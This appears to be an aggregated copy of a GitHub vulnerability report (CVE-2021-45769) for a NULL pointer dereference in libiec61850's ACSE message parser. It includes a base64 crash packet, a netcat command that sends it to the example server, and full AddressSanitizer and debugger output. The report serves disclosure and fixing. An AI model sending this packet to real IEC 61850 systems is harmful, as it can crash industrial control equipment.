Headline

CVE-2021-45769: NULL Pointer Dereference in AcseConnection_parseMessage · Issue #368 · mz-automation/libiec61850

A NULL pointer dereference in AcseConnection_parseMessage at src/mms/iso_acse/acse.c of libiec61850 v1.5.0 can lead to a segmentation fault or application crash.

2 years ago

CVE

Open in Source

#vulnerability #ubuntu #linux

NULL Pointer Dereference in AcseConnection_parseMessage****Description

A NULL Pointer Dereference was discovered in AcseConnection_parseMessage at src/mms/iso_acse/acse.c:429. The vulnerability causes a segmentation fault and application crash.

version

8eeb6f0

System information
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

Proof of Concept

poc

base64 poc
AwAAFgLwgA0NAQDBATGBAgABogIAAA==

command:

./server_example_basic_io
nc 0.0.0.0 102 < poc

Result

./server_example_basic_io
Using libIEC61850 version 1.5.0
Connection opened
AddressSanitizer:DEADLYSIGNAL
=================================================================
==4028537==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55de6e46db68 bp 0x7fac36efcaa0 sp 0x7fac36efc9f0 T3)
==4028537==The signal is caused by a READ memory access.
==4028537==Hint: address points to the zero page.
    #0 0x55de6e46db67 in AcseConnection_parseMessage src/mms/iso_acse/acse.c:429
    #1 0x55de6e41960b in IsoConnection_handleTcpConnection src/mms/iso_server/iso_connection.c:233
    #2 0x55de6e41ac5d in handleTcpConnection src/mms/iso_server/iso_connection.c:472
    #3 0x7fac3b7e3608 in start_thread /build/glibc-eX1tMB/glibc-2.31/nptl/pthread_create.c:477
    #4 0x7fac3b5bb292 in __clone (/lib/x86_64-linux-gnu/libc.so.6+0x122292)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/mms/iso_acse/acse.c:429 in AcseConnection_parseMessage
Thread T3 created by T1 here:
    #0 0x7fac3b837805 in pthread_create (/lib/x86_64-linux-gnu/libasan.so.5+0x3a805)
    #1 0x55de6e3b19dc in Thread_start hal/thread/linux/thread_linux.c:89
    #2 0x55de6e41b4f7 in IsoConnection_start src/mms/iso_server/iso_connection.c:581
    #3 0x55de6e417bf1 in handleIsoConnections src/mms/iso_server/iso_server.c:520
    #4 0x55de6e417c99 in isoServerThread src/mms/iso_server/iso_server.c:554
    #5 0x7fac3b7e3608 in start_thread /build/glibc-eX1tMB/glibc-2.31/nptl/pthread_create.c:477

Thread T1 created by T0 here:
    #0 0x7fac3b837805 in pthread_create (/lib/x86_64-linux-gnu/libasan.so.5+0x3a805)
    #1 0x55de6e3b19dc in Thread_start hal/thread/linux/thread_linux.c:89
    #2 0x55de6e4182d2 in IsoServer_startListening src/mms/iso_server/iso_server.c:682
    #3 0x55de6e3b9b50 in MmsServer_startListening src/mms/iso_mms/server/mms_server.c:606
    #4 0x55de6e3adae9 in IedServer_start src/iec61850/server/impl/ied_server.c:692
    #5 0x55de6e39537e in main /root/disk2/fuzzing/libiec61850/test/libiec61850/examples/server_example_basic_io/server_example_basic_io.c:146
    #6 0x7fac3b4c00b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)

==4028537==ABORTING

gdb

Using libIEC61850 version 1.5.0
[New Thread 0x7ffff3bff700 (LWP 4048010)]
[New Thread 0x7ffff33fe700 (LWP 4048011)]
Connection opened
[New Thread 0x7ffff2bfd700 (LWP 4048307)]

Thread 4 "server_example_" received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7ffff2bfd700 (LWP 4048307)]
0x0000555555661b68 in AcseConnection_parseMessage (self=0x608000004020, message=0x6060000030a8) at src/mms/iso_acse/acse.c:429
429         uint8_t messageType = buffer[bufPos++];
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────
 RAX  0x0
 RBX  0x7ffff2bfca20 ◂— 0x41b58ab3
 RCX  0x0
 RDX  0x0
 RDI  0x7ffff2bfca80 —▸ 0x7ffff2bfce60 ◂— 0x0
 RSI  0x0
 R8   0x0
 R9   0x32
 R10  0x40
 R11  0x0
 R12  0xffffe57f944 ◂— 0x0
 R13  0x7ffff2bfca20 ◂— 0x41b58ab3
 R14  0x7ffff2bfcb40 ◂— 0x41b58ab3
 R15  0x7ffff2bfcf80 ◂— 0x0
 RBP  0x7ffff2bfcaa0 —▸ 0x7ffff2bfce80 —▸ 0x7ffff2bfceb0 ◂— 0x0
 RSP  0x7ffff2bfc9f0 —▸ 0x6060000030a8 ◂— 0x0
 RIP  0x555555661b68 (AcseConnection_parseMessage+383) ◂— movzx  eax, byte ptr [rcx]
──────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
 ► 0x555555661b68 <AcseConnection_parseMessage+383>    movzx  eax, byte ptr [rcx]
   0x555555661b6b <AcseConnection_parseMessage+386>    mov    byte ptr [rbp - 0x95], al
   0x555555661b71 <AcseConnection_parseMessage+392>    mov    ecx, dword ptr [rbp - 0x90]
   0x555555661b77 <AcseConnection_parseMessage+398>    mov    edx, dword ptr [rbp - 0x8c]
   0x555555661b7d <AcseConnection_parseMessage+404>    lea    rsi, [rdi - 0x40]
   0x555555661b81 <AcseConnection_parseMessage+408>    mov    rax, qword ptr [rbp - 0x88]
   0x555555661b88 <AcseConnection_parseMessage+415>    mov    rdi, rax
   0x555555661b8b <AcseConnection_parseMessage+418>    call   BerDecoder_decodeLength                <BerDecoder_decodeLength>

   0x555555661b90 <AcseConnection_parseMessage+423>    mov    dword ptr [rbp - 0x8c], eax
   0x555555661b96 <AcseConnection_parseMessage+429>    cmp    dword ptr [rbp - 0x8c], 0
   0x555555661b9d <AcseConnection_parseMessage+436>    jns    AcseConnection_parseMessage+448
       <AcseConnection_parseMessage+448>
──────────────────────────────────────────[ SOURCE (CODE) ]───────────────────────────────────────────
In file: /root/disk2/fuzzing/libiec61850/test/libiec61850/src/mms/iso_acse/acse.c
   424
   425     int messageSize = message->size;
   426
   427     int bufPos = 0;
   428
 ► 429     uint8_t messageType = buffer[bufPos++];
   430
   431     int len;
   432
   433     bufPos = BerDecoder_decodeLength(buffer, &len, bufPos, messageSize);
   434
──────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────
00:0000│ rsp     0x7ffff2bfc9f0 —▸ 0x6060000030a8 ◂— 0x0
01:0008│         0x7ffff2bfc9f8 —▸ 0x608000004020 ◂— 0x0
02:0010│         0x7ffff2bfca00 —▸ 0x7ffff2bfcb40 ◂— 0x41b58ab3
03:0018│         0x7ffff2bfca08 —▸ 0xa2310146 ◂— 0x0
04:0020│         0x7ffff2bfca10 —▸ 0x100000000 ◂— 0x0
05:0028│         0x7ffff2bfca18 ◂— 0x0
06:0030│ rbx r13 0x7ffff2bfca20 ◂— 0x41b58ab3
07:0038│         0x7ffff2bfca28 —▸ 0x5555556d71d8 ◂— '1 32 4 7 len:431'
────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────
 ► f 0   0x555555661b68 AcseConnection_parseMessage+383
   f 1   0x55555560d60c IsoConnection_handleTcpConnection+1422
   f 2   0x55555560ec5e handleTcpConnection+43
   f 3   0x7ffff7564609 start_thread+217
──────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> bt
#0  0x0000555555661b68 in AcseConnection_parseMessage (self=0x608000004020, message=0x6060000030a8) at
 src/mms/iso_acse/acse.c:429
#1  0x000055555560d60c in IsoConnection_handleTcpConnection (self=0x61100000ff40, isSingleThread=false) at src/mms/iso_server/iso_connection.c:233
#2  0x000055555560ec5e in handleTcpConnection (parameter=0x61100000ff40) at src/mms/iso_server/iso_connection.c:472
#3  0x00007ffff7564609 in start_thread (arg=<optimized out>) at pthread_create.c:477
#4  0x00007ffff733c293 in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:95

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda

9 months ago

9 months ago

9 months ago

9 months ago

9 months ago